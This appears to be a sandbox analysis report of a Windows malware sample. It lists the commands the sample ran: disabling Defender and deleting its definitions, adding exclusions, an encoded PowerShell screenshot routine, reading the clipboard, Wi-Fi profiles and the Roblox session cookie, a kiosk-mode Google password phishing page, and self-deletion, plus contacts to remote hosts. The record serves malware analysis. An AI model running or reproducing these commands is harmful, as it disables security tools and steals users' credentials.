C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe

"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"

C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe

"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\complacence\outvaunts.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8084 -ip 8084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 84

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe" & rd /s /q "C:\ProgramData\D2NGDJWL6P8Q" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1852 -prefsLen 23680 -prefMapSize 244710 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58c94699-cbfe-4420-b41a-8a1606560f26} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" gpu

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2740 -ip 2740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1964

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6bb4564-91f3-4b67-9426-714b4e39a106} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" socket

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2700 -ip 2700

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\getmac.exe

getmac

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "9504" "2052" "1984" "2056" "0" "0" "2060" "0" "0" "0" "0" "0"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 1284

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2864 -prefsLen 22652 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734c80fc-651f-49f2-9356-25c525c14818} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8504 -ip 8504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8504 -s 1172

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3948 -prefMapHandle 3944 -prefsLen 29090 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39901a94-73cc-4713-964f-9945c4dbfd3b} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4636 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4632 -prefMapHandle 4744 -prefsLen 29197 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d33af55d-c1bc-40a8-891f-23e22f839eb2} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" utility

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 3 -isForBrowser -prefsHandle 4956 -prefMapHandle 4928 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f87da659-a649-4ea8-9525-4e2130d98c46} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 4 -isForBrowser -prefsHandle 2664 -prefMapHandle 4936 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1514b62-5618-4e82-989e-ad69f425c8d3} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5196 -prefMapHandle 5108 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99fe053f-7586-44af-9da4-66e9de754eab} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 10132 -ip 10132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10132 -s 848

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.133.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 234.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
RU 31.41.244.12:80 31.41.244.12 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
